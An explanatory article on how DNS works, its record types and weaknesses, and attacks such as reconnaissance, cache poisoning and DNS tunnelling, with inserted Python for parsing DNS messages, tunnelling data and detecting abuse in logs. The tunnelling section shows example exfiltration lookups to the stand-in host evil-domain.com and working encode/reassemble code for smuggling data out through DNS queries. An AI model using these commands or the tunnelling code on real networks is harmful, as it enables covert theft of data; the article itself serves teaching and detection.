The Domain Name System (DNS) is a fundamental component of modern networking that translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to talk to each other. DNS pre-dates the World Wide Web, and facilitates virtually all communications over the Internet, as well as other uses that couldn’t even have been dreamt of when it was developed in the early 1980s. However, the lack of security features in this long-lived networking protocol has led to numerous vulnerabilities and attacks. In this article, we’ll answer questions like “What is DNS?”, “How Does DNS Work?”, and “What Are The Different Types of DNS Records?”
- What Is DNS?
- How DNS Works
- DNS Queries, Servers, and Record Types
- Advantages and Weaknesses of DNS
- Types of DNS Attacks
- Hijacking DNS to Redirect Traffic
- Using DNS as a Covert Channel
What Is DNS?
DNS is often referred to as the internet’s version of the Yellow Pages. Back in the olden times, when you needed to find a business’ address, you looked it up in the Yellow Pages. DNS is just like that, except you don’t actually have to look anything up: your internet-connected computer does that for you. It’s how your computer knows how to find Google, or Newszetu.com, or bigfivehost.com.
For two computers to communicate on an IP network, each needs an IP address. Think of an IP address like a street address: for one computer to “locate” another, it needs to know the other computer’s number. Since most humans are better at remembering names (www.bigfivehost.com) than numbers (95.111.242.18), a system was needed to translate names into IP addresses on their behalf.
DNS is most often thought of in the context of the World Wide Web, but in truth, there’s a DNS lookup behind nearly every type of network request – even those not initiated by a user. Software updates, social media apps, and even malware will generally reach out to a hostname rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.
How DNS Works
DNS is such an integral part of the internet that it’s important to understand how it works.
Think of DNS like a phone book, but instead of mapping people’s names to their street address, the phone book maps computer names to IP addresses. Each mapping is called a “DNS record.” DNS clients on connected devices reach out to DNS servers to retrieve these records. Different record types are used for different purposes. Web browsers rely on “A” (and “AAAA”) records, while the “MX” record points towards the domain’s mail server. This is how it’s possible to host a website with one service provider and email service at another.
Here’s a look at the “A” records for varonis.com as displayed by the popular command-line utility dig:
As you can see in the example, it’s possible to have multiple records for a single hostname or domain. This can be used to provide both redundancy and load balancing.
The internet has a lot of computers, so it doesn’t make sense to put all of these records in one big book. Instead, DNS is organized into smaller books, or domains. Domains can be very large, so they are further divided into smaller books called “zones.” No single DNS server stores all the books; that would be impractical.
Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it might ask the DNS server on your local router. The local router will in turn make an “upstream” query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can go “upstream” until they reach the domain’s authority, or “authoritative name server.” In practice, results are often “cached” at lower levels to avoid the need to go through the entire process for every query.
An authoritative name server is where administrators manage the names and IP addresses for their domains. Whenever a DNS administrator wants to add, change or delete a server name or an IP address, they make the change on the primary authoritative server (older documentation calls this the “master” DNS server). Secondary servers (formerly “slaves”) hold copies of the zone, obtained from the primary through zone transfers, and answer queries authoritatively as well, so the zone stays available if one server fails.
DNS Queries, Servers, and Record Types
The basic concepts behind DNS are relatively straightforward, but over the years the technical side of things has grown increasingly complex. Here’s a look at some of the system’s inner workings:
What Are the Types of DNS Queries?
A DNS query is the message sent from a client to a DNS server, or between two DNS servers. A DNS query can be one of the following:
- Recursive DNS Query
In a recursive DNS query, the client sets the “recursion desired” flag and asks a resolver to do the whole job: the resolver makes upstream requests for the domain in question until it has a final answer (or a definitive “no such name”) and returns it. There can be a single hop or dozens. The resolver, or even the local DNS client, may already have the result cached. A time-to-live (TTL) value carried with each record governs how long it may be cached; once the TTL expires, the client or server must ask upstream again.
- Iterative DNS Query
In an iterative DNS query, the server being asked does not chase the answer on the requester’s behalf. It answers from its own zones or cache if it can; if it can’t, it returns a referral to a server closer to the answer, such as a TLD name server or the domain’s authoritative name server. The requester follows these referrals one iteration at a time until it gets an answer or gives up. This is how a recursive resolver itself talks to the root, TLD and authoritative servers.
What are the Types of DNS Server?
As stated already, DNS is a distributed system, meaning that servers all over the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:
- DNS Recursor
Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, responds if a hit is available in its cache, or reaches out to a nameserver further up the chain. Recursors are often run by Internet Service Providers, but it’s easy to change the DNS configuration of a computer to point to another resolver for performance, security, or privacy reasons.
- DNS Root Server
As the name implies, root servers are the foundation from which the entire DNS tree grows. They are authoritative for the root zone, which holds the delegations (NS records and glue addresses) that tell a resolver which name servers are authoritative for each top-level domain (TLD) like “.com” and “.net”. There’s a chicken-and-egg problem, however, because the root servers themselves have hostnames (a.root-servers.net through m.root-servers.net) inside one of those very TLDs. If a resolver can’t determine which nameserver to turn to for “.net”, how can it possibly resolve “a.root-servers.net”? The answer is that resolvers are “bootstrapped” with a built-in “root hints” list of the thirteen root server names and their IPv4 and IPv6 addresses (each served from many anycast locations worldwide). These addresses rarely change, and a resolver only needs to reach one of them to fetch the current list of all the others.
- TLD Name Server
TLD name servers are second in importance only to the root servers, as they know which name servers to turn to for any domain registered under a given TLD. When you look up www.bigfivehost.com, a root server first refers the resolver to the “.com” TLD servers, and a “.com” server then responds with a referral to the name servers holding the records for the “bigfivehost.com” portion of the name.
- Authoritative Name Server
The authoritative name server is the final stop for a DNS query. This server, or often servers for the sake of redundancy, is the highest authority for a given domain. Not all DNS queries make it up to the authoritative nameserver, however, as there may be cached results closer to the initial request.
Organizations also frequently use DNS internally. The operation isn’t much different, except that DNS lookups and records stay within the corporate network instead of on the Internet. This is known as “private” or “local” DNS in contrast to the public DNS service.
What are the types of DNS Records?
DNS records come in a wide variety of types, each used for different purposes. Here’s a look at just a few of the most common:
- “A” Record – Classic use of DNS, translates a domain into an IPv4 address.
- “AAAA” Record – Same functionality as an “A” record, but using an IPv6 address instead of IPv4.
- “MX” Record – Short for “Mail Exchange”, identifies the e-mail server associated with the domain.
- “TXT” Record – Used for a wide variety of purposes, from proving domain ownership to publishing the SPF policies and DKIM public keys that receiving mail servers use to authenticate email and fight spam.
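To make the pieces above concrete (a query with the recursion-desired flag set, a response carrying several A records with their TTLs, and the compressed names real servers send), here is an added example that is not code from the article. It builds and parses DNS messages in the RFC 1035 wire format using only Python’s standard library; the hostnames and the 192.0.2.x addresses are constructed for illustration.

```python
"""Minimal DNS wire-format encoder/decoder (RFC 1035) using only the standard library.
Added example, not code from the article: it builds the query a client sends, a
constructed response carrying several A records with TTLs (and an MX record), and
parses them back, including the name-compression pointers real servers emit."""
import socket
import struct

QTYPES = {"A": 1, "NS": 2, "SOA": 6, "MX": 15, "TXT": 16, "AAAA": 28}
TYPE_NAMES = {v: k for k, v in QTYPES.items()}


def encode_name(name: str) -> bytes:
    """'www.example.com' -> length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:          # RFC 1035 label limit
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode the name at `off`, following 0xC0xx compression pointers.
    Returns (name, offset just past the name as it appeared at `off`)."""
    labels, end, jumped, hops = [], off, False, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:            # pointer: 2 bytes, 14-bit offset
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped, hops = True, hops + 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def build_query(name: str, qtype: str, txid: int) -> bytes:
    """Header with RD=1 (recursion desired), one question, empty other sections."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)


def build_response(query: bytes, answers) -> bytes:
    """Constructed reply to `query`: echoes ID and question, sets QR|RD|RA, and appends
    one RR per (type, ttl, rdata). Owner names use a pointer to the question (0xC00C)."""
    txid = struct.unpack("!H", query[:2])[0]
    _, qend = decode_name(query, 12)
    question = query[12:qend + 4]             # QNAME + QTYPE + QCLASS
    rrs = b""
    for rtype, ttl, rdata in answers:
        if rtype == "A":
            rd = socket.inet_aton(rdata)
        elif rtype == "AAAA":
            rd = socket.inet_pton(socket.AF_INET6, rdata)
        elif rtype == "MX":                   # rdata = (preference, exchange host)
            rd = struct.pack("!H", rdata[0]) + encode_name(rdata[1])
        else:
            raise ValueError(f"unsupported type {rtype}")
        rrs += b"\xc0\x0c" + struct.pack("!HHIH", QTYPES[rtype], 1, ttl, len(rd)) + rd
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)
    return header + question + rrs


def parse_message(msg: bytes) -> dict:
    """Parse header, question and answer sections into plain Python values."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, TYPE_NAMES.get(qtype, qtype)))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _cls, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rd = msg[off:off + rdlen]
        if rtype == 1:
            rdata = socket.inet_ntoa(rd)
        elif rtype == 28:
            rdata = socket.inet_ntop(socket.AF_INET6, rd)
        elif rtype == 15:
            rdata = (struct.unpack("!H", rd[:2])[0], decode_name(msg, off + 2)[0])
        else:
            rdata = rd                         # leave other types raw
        off += rdlen
        answers.append({"name": name, "type": TYPE_NAMES.get(rtype, rtype),
                        "ttl": ttl, "rdata": rdata})
    return {"id": txid, "is_response": bool(flags & 0x8000), "rcode": flags & 0xF,
            "questions": questions, "answers": answers}
```

Feeding `build_query(...)` to a real resolver over UDP port 53 and passing the reply to `parse_message` is all a minimal client needs; the same parser also reads the multiple-A-record answers that provide redundancy and load balancing, each with its own TTL.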
Advantages and Weaknesses of DNS
DNS has both advantages and weaknesses:
Advantages
There are many good reasons we’re still using DNS after all these years. Some of the advantages of the system include:
- It’s Distributed and Resilient
There weren’t many domains in use during the early days of the Internet, so it’s conceivable we could have ended up with a single central database with all of the domain-to-IP mappings. This, of course, wouldn’t have allowed for the scalability required to power the modern Internet. The distributed nature of DNS also means the system is resilient; a power outage, cut fiber cable, or cyberattack on one DNS server won’t disrupt the system as a whole.
- It’s Versatile and Extensible
The developers of DNS always intended for the protocol to be extensible as technology progressed. Extensions to the original DNS standard have brought new features and functionality while still maintaining backward compatibility. New types of records, refined rules for the delivery of DNS packets, and enhanced security have all been added over the years.
- It’s an Open and Well-Documented Standard
DNS wasn’t born out of a particular vendor’s dominance or desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. Many different DNS client and server implementations exist, but because they conform to a common standard they can all work together.
Weaknesses and Vulnerabilities
The first iterations of the Domain Name System (DNS) date to the early 1980s, well before the emergence of modern cybersecurity threats. As a result, DNS, like many other older protocols still in use today such as ARP and ICMP, never included much in the way of security features. A variety of extensions and mitigations have been devised in the ensuing years as new threats have emerged, but DNS is still frequently abused by attackers.
From a threat actor’s perspective, there are several characteristics that make DNS appealing:
- Every Network Uses It
DNS is ubiquitous. Nearly every computer network in the world sees thousands to millions of DNS queries every single day. While it isn’t technically required to operate an IP network, blocking or restricting DNS simply isn’t practical, so nearly every firewall on the planet is configured to allow outbound traffic on UDP and TCP port 53. This means that attackers not only have an almost guaranteed way out of a compromised network, but also plenty of legitimate traffic to blend in with.
- There’s No Authentication
Like many other early network protocols, DNS never included an authentication mechanism. This means that in the core DNS protocol, there is no way to be sure a particular result is genuine. Attackers have taken advantage of this with a whole range of opportunities for spoofing and poisoning attacks targeting everything from individual machines to large swaths of the entire Internet.
The lack of authentication in DNS became front-page news in 2008 when security researcher Dan Kaminsky disclosed a cache-poisoning technique that worked against nearly every recursive resolver then in use. A resolver accepted any response that arrived carrying the 16-bit transaction ID it was expecting; by provoking lookups for many random names under a target domain and flooding the resolver with forged replies, an attacker could win that guessing game quickly and trick a legitimate resolver into handing out bogus addresses for important domains like a bank or government institution.
The coordinated short-term fix was to randomize the UDP source port of outgoing queries as well, so an attacker had roughly 32 bits to guess instead of 16. The longer-term answer is Domain Name System Security Extensions (DNSSEC), which uses public-key cryptography to sign DNS records so that a validating resolver can verify they were published by the zone’s operator and not altered in transit. DNSSEC authenticates data; it does not encrypt it, and it only helps where the zone is signed and the resolver actually validates.
- There’s No Encryption Either
DNS Queries and the accompanying responses are sent in plaintext, meaning anyone on the network can view them with a tool like Wireshark. This presents potential privacy problems because it means that your co-workers, boss, or even ISP can tell which domains you’ve interacted with. This is true even for websites that leverage SSL/TLS encryption; the actual data being transferred between the site and your computer may not be viewable, but that initial DNS query that gave you the site’s IP address in the first place is.
Two approaches have been standardized to encrypt DNS traffic between a client and its resolver: DNS over HTTPS (DoH, RFC 8484, carried over TCP port 443) and DNS over TLS (DoT, RFC 7858, over TCP port 853). Both protect only that first hop: the resolver still sees every query, and its own lookups towards authoritative servers are typically still plaintext. Which approach to use, and whether DNS should be encrypted at all given that it also blinds network defenders, remains a matter of fierce debate.
Types of DNS Attacks
DNS Reconnaissance Attacks
DNS is all about information, which from an attacker’s perspective can be an invaluable tool. DNS queries can be used to map out a victim’s network infrastructure by revealing live hosts on a network, uncovering the hostnames of high-value targets like mail and file servers, and providing clues about applications and services in use. You can perform your own local DNS recon mission just by following the instructions below:
If you have a Windows computer, run the following commands as is; on Linux or macOS the equivalents are ip addr (or ifconfig) and dig or host.
- Open a command prompt (press Ctrl + Esc to open the Start menu, type “cmd”, then press Enter).
- Type ipconfig
- You’ll see the DNS domain you’re in (Connection-specific DNS Suffix), your IP address, and a bunch of other stuff. You will want to refer back to this.
- Type nslookup [your IP address]. This performs a reverse (PTR) lookup: you’ll see the name of the DNS server that’s responding and, if a PTR record exists for the address, the hostname registered for it.
- nslookup -type=soa [your domain] returns the zone’s Start of Authority record, which names the primary authoritative DNS server and the administrator’s contact address. Wouldn’t that be handy if you were trying to infiltrate a network?
- nslookup -type=MX [your domain] returns all of the mail servers for your local domain, just in case you wanted to hack mail servers and didn’t know where they were.
As we’ve already learned, most networks have lots of DNS queries going on all the time. To many off-the-shelf security products and network monitoring solutions, the queries used by an attacker to enumerate a network don’t look much different from all of the other legitimate queries. Solutions like Varonis Edge address this problem by correlating DNS requests with other data points to identify suspicious behavior patterns.
Hijacking DNS to Redirect Traffic
The lack of authentication in the original DNS protocol gives attackers a huge upper hand because it means queries and responses can be manipulated or forged at many different points from the local machine right up to global DNS resolvers.
A classic local network attack involves chaining ARP Spoofing with a rogue DNS server. If successful, this will cause other machines on the network to funnel their DNS queries to a server that the attacker controls. The attacker can then return their own IP addresses for those queries instead of the rightful address. Without mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that they were actually communicating with a malicious forgery.
Attackers can also use a variety of techniques to poison the cache of legitimate DNS servers. This generally occurs when organizations are running their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have global impacts, so these providers tend to be very security conscious. However, even the large providers aren’t immune from vulnerabilities.
If an attacker successfully spoofs a DNS response, they can make the receiving DNS server cache a poisoned record. So how does that help the attackers?
Here’s an example: Let’s say an attacker learns that your organization uses an external application for something important, like expenses. If they poison your organization’s DNS server so that it sends each user to the attacker’s server, all they need to do is create a legitimate-looking login page, and users will enter their credentials. They might even relay the traffic to the real server (acting as a “man in the middle”), so no one notices. The attacker can then try those credentials on other systems, sell them or just celebrate with an evil laugh.
Using DNS as a Covert Channel
Since outbound DNS traffic is almost never blocked, and there tends to be a lot of it, using DNS for data exfiltration or covert communications has become a favorite tactic of many sophisticated adversaries. The attackers’ goal is to blend in with all that legitimate traffic through a technique called DNS tunneling. In its crudest form, an attacker simply misuses the DNS protocol as a transport, stuffing data into oddly formed queries and responses exchanged directly with a server they control. This is risky, however, as it can generate large spikes or unusual traffic patterns that a well-prepared organization can quickly notice.
A more sophisticated approach involves abusing DNS infrastructure itself. The malicious actor will set up a DNS domain (evil-domain.com, for example) on the internet and create an authoritative name server. Then, on the compromised host, the attacker can use a program that breaks up the data into small chunks and inserts it into a series of lookups, like so:
- nslookup My1secret1.evil-domain.com
- nslookup is1that1I1know.evil-domain.com
- nslookup how2steal1data.evil-domain.com
The organization’s internal DNS resolver receives these requests, finds nothing in its cache, and forwards them to evil-domain.com’s authoritative name server. The attacker is expecting this traffic, so a program on that name server extracts the leading labels of each query (everything before evil-domain.com) and reassembles the data. Unless the organization inspects the queries its own DNS servers make, it may never realize its resolvers were used to exfiltrate data.
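The mechanics of that exchange, as an added example that is not code from the article: the client side splits a payload into chunks and encodes each into the leftmost labels of a query under evil-domain.com (the zone the text uses), and the server side, playing the attacker’s authoritative name server, reassembles them. The sequence-number label format is an assumption of this example, chosen to survive the out-of-order delivery and resolver retries a real tunnel sees.

```python
"""DNS tunnelling as described above: a payload is split into chunks, each chunk is
encoded into the leftmost labels of a query under the attacker's zone, and the
attacker's authoritative server reassembles the chunks. Added example, not code from
the article; evil-domain.com is the zone the text uses, the "<seq>-<total>" label is an
assumption of this example."""
import base64
import math

ZONE = "evil-domain.com"
MAX_LABEL = 63      # RFC 1035: a label is at most 63 bytes
MAX_NAME = 253      # and a full name at most 253 characters in text form


def encode_chunks(payload: bytes, zone: str = ZONE, chunk_size: int = 30) -> list:
    """Client side. Base32 is used because DNS names are case-insensitive and some
    resolvers randomise letter case in transit, which would corrupt base64 data."""
    total = math.ceil(len(payload) / chunk_size)
    names = []
    for seq in range(total):
        chunk = payload[seq * chunk_size:(seq + 1) * chunk_size]
        data = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        labels = [f"{seq}-{total}"]                       # sequence number / total chunks
        labels += [data[i:i + MAX_LABEL] for i in range(0, len(data), MAX_LABEL)]
        name = ".".join(labels + [zone])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for a DNS name")
        names.append(name)
    return names


def decode_queries(names, zone: str = ZONE) -> bytes:
    """Server side. Queries may arrive out of order or be repeated (resolver retries),
    so chunks are keyed by sequence number and only joined once all are present."""
    suffix = "." + zone.lower()
    chunks, total = {}, None
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                     # unrelated query, ignore
        labels = name[:-len(suffix)].split(".")
        seq, total = (int(x) for x in labels[0].split("-"))
        data = "".join(labels[1:]).upper()
        data += "=" * (-len(data) % 8)                   # restore stripped base32 padding
        chunks[seq] = base64.b32decode(data)
    if total is None or len(chunks) != total:
        raise ValueError("payload incomplete")
    return b"".join(chunks[i] for i in range(total))
```

Each query name is what would appear in the resolver’s logs, which is also why tunnelling stands out to anyone who looks: long, high-entropy labels under a single domain, with almost no repeats.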
And Even More Types of Attacks!
The list above is by no means a complete list of all the possible DNS attacks. The protocol’s been abused for everything from DDoS campaigns to covert tracking of Internet users. Attackers have recently been observed modifying the DNS configuration in several varieties of home routers to spread malware. Malicious actors and security researchers alike are constantly probing for new vulnerabilities, and it’s unlikely their attention will shift any time soon.
DNS has been around for a long time, and every computer connected to the internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Luckily, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and thwarted.
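As an added example of the monitoring the conclusion calls for (not Varonis code, and not from the article), here are two simple heuristics run over resolver query-log lines: flagging a domain that receives many distinct, long, high-entropy subdomains, which is what the tunnelling described earlier looks like, and flagging a client that asks for zone metadata (SOA, ANY, AXFR) or sweeps reverse (PTR) records, which is what the reconnaissance walkthrough looks like. The log format is BIND-style, the sample lines are constructed, and the thresholds are illustrative rather than tuned.

```python
"""Detection heuristics for the two abuses the article describes, tunnelling and
reconnaissance, run over resolver query-log lines. Added example, not Varonis code;
the log format is BIND-style, the sample lines are constructed, and the thresholds
are illustrative starting points rather than tuned values."""
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

# client IP, queried name and record type from a BIND-style "query:" log line
LOG_RE = re.compile(
    r"client (?:@\S+ )?(?P<src>[\d.]+)#\d+.*?query: (?P<name>\S+) IN (?P<qtype>\S+)")


def shannon_entropy(s: str) -> float:
    """Bits per character; random base32/hex payload scores far above English words."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registered_domain(name: str) -> str:
    """Naive last-two-labels rule (an assumption); production code needs the Public Suffix List."""
    return ".".join(name.split(".")[-2:])


def parse(lines):
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            yield m["src"], m["name"].lower().rstrip("."), m["qtype"].upper()


def detect(lines, min_unique=15, min_prefix=20, min_entropy=3.5,
           recon_types=("SOA", "ANY", "AXFR"), min_meta=2, min_ptr=5):
    """Return (kind, subject, detail) alerts.
    tunnelling: one domain receives many distinct, long, high-entropy subdomains
    recon:      one client asks for zone metadata or sweeps PTR (reverse) records"""
    prefixes = defaultdict(set)
    per_client = defaultdict(Counter)
    for src, name, qtype in parse(lines):
        dom = registered_domain(name)
        if name != dom:
            prefixes[dom].add(name[:-(len(dom) + 1)])
        per_client[src][qtype] += 1
    alerts = []
    for dom, subs in sorted(prefixes.items()):
        odd = [p for p in subs
               if len(p) >= min_prefix and shannon_entropy(p.replace(".", "")) >= min_entropy]
        if len(odd) >= min_unique:
            alerts.append(("tunnelling", dom, f"{len(odd)} distinct high-entropy subdomains"))
    for src, counts in sorted(per_client.items()):
        meta = sum(counts[t] for t in recon_types)
        if meta >= min_meta or counts["PTR"] >= min_ptr:
            alerts.append(("recon", src,
                           f"{meta} zone-metadata queries, {counts['PTR']} PTR lookups"))
    return alerts


def constructed_log():
    """Constructed sample traffic, not a real capture: ordinary lookups, one client
    sweeping reverse records and zone metadata, one host tunnelling via evil-domain.com."""
    lines = [
        "client 10.0.0.21#51023: query: www.bigfivehost.com IN A",
        "client 10.0.0.21#51024: query: www.bigfivehost.com IN AAAA",
        "client 10.0.0.22#49877: query: mail.bigfivehost.com IN MX",
        "client 10.0.0.23#50111: query: updates.example.net IN A",
        "client 10.0.0.99#40002: query: corp.example IN SOA",
        "client 10.0.0.99#40003: query: corp.example IN ANY",
    ]
    lines += [f"client 10.0.0.99#40001: query: {i}.2.0.10.in-addr.arpa IN PTR"
              for i in range(1, 9)]
    for i in range(30):   # stands in for base32-encoded payload chunks
        digest = hashlib.sha256(str(i).encode()).digest()
        chunk = base64.b32encode(digest).decode("ascii").lower()[:40]
        lines.append(f"client 10.0.0.57#53211: query: {i}-30.{chunk}.evil-domain.com IN A")
    return lines
```

The point of correlating across lines, rather than judging each query alone, is exactly the one made earlier: a single SOA or PTR lookup, or one odd-looking subdomain, is indistinguishable from legitimate traffic, but thirty unique high-entropy names under one domain from one host, or one client walking a reverse range, is not.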